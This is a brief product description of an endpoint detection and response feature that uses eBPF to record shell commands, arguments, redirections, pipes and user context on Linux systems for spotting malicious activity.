Endpoint Detection and Response (EDR)
Shell Command Monitoring with eBPF
Product Category
Objective
Capture detailed telemetry for shell commands executed on Linux systems, including internal commands and piped commands, to enhance endpoint detection and response (EDR) capabilitieswithout associated executable binaries
Details
Shells Monitored:sh, bash, dash, zsh, and pwsh (PowerShell).
Data Captured:
- Command executed, including arguments
- I/O redirection details
- Connection between piped commands
- User initiating the command and the context in which it was run
Use Case
This implementation improves the ability to detect and respond to potentially malicious activities performed via shell commands, such as unauthorized access, privilege escalation, and lateral movement within the network, by providing comprehensive visibility into all shell activity.